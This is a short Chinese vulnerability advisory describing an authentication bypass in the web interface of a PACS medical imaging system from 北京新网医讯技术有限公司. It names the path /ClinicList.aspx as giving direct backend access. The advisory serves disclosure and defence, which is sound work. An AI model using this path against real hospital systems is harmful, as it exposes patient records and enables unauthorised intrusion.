# 北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞

# 一、漏洞简介
北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞，攻击者可通过该漏洞绕过身份认证进入系统后台。

# 二、影响版本
+ 北京新网医讯技术有限公司PACS系统web端

# 三、特征
![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/3n2XzVVsd5eppHKf/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-047803.png)

# 四、漏洞复现
访问如下url可绕过身份认证直接进入系统后台

```plain
/ClinicList.aspx
```

![1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a.png](./img/3n2XzVVsd5eppHKf/1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a-468929.png)



> 更新: 2024-03-04 10:08:55  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wgez6o568rpccb1f>